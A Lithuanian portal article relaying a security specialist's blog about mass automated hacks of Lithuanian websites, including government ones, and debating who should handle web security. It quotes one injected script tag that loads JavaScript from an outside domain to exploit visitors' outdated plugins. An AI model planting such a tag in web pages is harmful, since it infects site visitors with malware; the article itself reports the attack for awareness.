Nelabai maloni naujiena daugumai tinklapių savininkų, o ir po juos naršantiems lankytojams. Pasirodo užsikrėsti pavojingomis programomis galima net ir nelendant į nelegalius ar erotinės tematikos puslapius – tam visiškai pakanka pasivaikščioti po oficialius ir įprastinius lietuviškus tinklapius. Apie tai savo dienoraštyje su komentarais pasakoja informacijos apsaugos specialistas Audrius Lučiūnas.

Štai kaip susidariusią situaciją pristato Audrius Lučiūnas.

Pastaruoju metu internete įvyksta vis daugiau automatizuotų tinklalapių nulaužimų. Laužiama iš karto dideliais kiekiais. Pvz. po 10 000 vnt. iš karto. Ir nesirenkama kas laužiamas. Svarbu didelis kiekis išnaudojant tam tikrus šabloninius tinklalapių pažeidžiamumus. Atakos metu į tinklalapius įterpiamas papildomas kodas. T.y. puslapis šiek tiek patiuninguojamas. Tas tiuningas, tai yra JavaScript’as, kuris tinklalapio lankytojų sistemose ieško pažeidžiamumų ir tuos pažeidžiamumus bando išnaudoti. Pvz. jei turit neatnaujintą kokį nors Adobe Reader’į, seną QuickTime grotuvą ar Flash’o versiją, tai po apsilankymo tokiam nulaužtam puslapyje, kompiuteryje dar turėsit ir kokią nors papildomą žalingą programą. O Jūsų nuomonės apie tai niekas net ir neklaus. Po visų tokių masinių atakų, pažeisti puslapiai turėdavo žalingą kodą su Šanchajuje ar kur nors kitur Kinijoje registruotais domenais. Paskutinė ataka vyko balandžio mėn. ir į puslapius pridėdavo štai tokį kodą: <script src=http://www.nihaorr1.com/1.js></script>. Kiek iš skaitančių šį tinklaraštį nukentėjo nuo šios atakos? O kiek apie nukentėjusias įmones parašė spauda? Be problemų galim įvertinti kaipgi sekėsi lietuviškiems tinklalapiams. Aišku, kaip gi čia be google’o.

Tarp laimingųjų pateko ir Susisiekimo ministerija, ir policijos komisariatas, o pažiurėję žemiau rasite ir tinklalapius ministraspirmininkas.lt, bonumpublicum.lt, 5ci.lt, books.lt ir t.t. 5ci tai turbūt kiek puslapių turėjo, tai visus ir nulaužė. Tačiau nei vienas nesugebėjo net tyliai pasakyti ką nors panašaus į "Mieli mūsų tinklalapio lankytojai, nepykit, kad užkrėtėm Jus žalingom programom po Kinijos įsilaužėlių atakos. Nuo žalingų programų galite pasitikrinti taip ir va kaip. O mes prisipažįstame klydę ir kad tai daugiau nepasikartotų darysime taip ir va kaip." ar kažkaip kitaip įspėti bei atsiprašyti savo lankytojų. O kur atsakomybė prieš visą tautą? Ypač iš valstybinių įstaigų? Na taip, juk geriau viską susitvarkyti tyliai, gal niekas nieko nepastebės. Bet google’as viską mato. Ir mes irgi matom. O dabar dar turim progą apie tai ir pakalbėti garsiai, ir dar per dantį patraukti…

Kadangi mes irgi esame internetinis portalas, tad ši situacija liečia ir mus tiesiogiai. Tad dėl Audriaus pateiktų komentarų mums nesinori sutikti – galbūt oficialios institucijos ar stambios bendrovės ir gali sau leisti samdyti IT specialistą nuolatiniam saugumo tikrinimui, tačiau mažiems projektams tai praktiškai neįmanoma. Tuo labiau, jei projektas informacinis, paprastai jį administruoja ne IT specialistai, o tos srities mėgėjai ir entuziastai. Jeigu jie pastoviai sektų tokius įsibrovimus ir ieškotų informacijos apie tai, tuomet kas publikuotų naujienas? Žodžiu, mūsų požiūriu, tokios saugumo problemos yra didžiulės. Juk atvirai kalbant, mes ir patys apie šias atakas sužinojome tik iš Audriaus dienoraščio – visa laimė, jog bent jau google apkrėstųjų sąraše mes nefiguruojame. Bent jau kol kas....

Tad kokie galimi sprendimo keliai? Labai panaši situacija į visuomeninį gyvenimą – jei kiekvienas iš mūsų turėtų gaudyti nusikaltėlius, kada statytume namus, gydytume žmones, pardavinėtume prekes? Tuo užsiima policija, saugumo tarnybos – tai galbūt ir internete saugumu turėtų užsiimti viena iš valstybinių institucijų (šalia gali veikti ir privačios mokamos institucijos), pranešanti apie tokias atakas, perspėjanti kaip nuo jų saugotis ir kaip pasitikrinti. Juk internetas plečiasi, tad ar ne laikas skirstytis veiklomis ir šioje srityje?...

Parengta pagal:

Audriaus Lučiūno dienoraštį,

UAB "Informacijos saugos sprendimai"

Komentarai (15)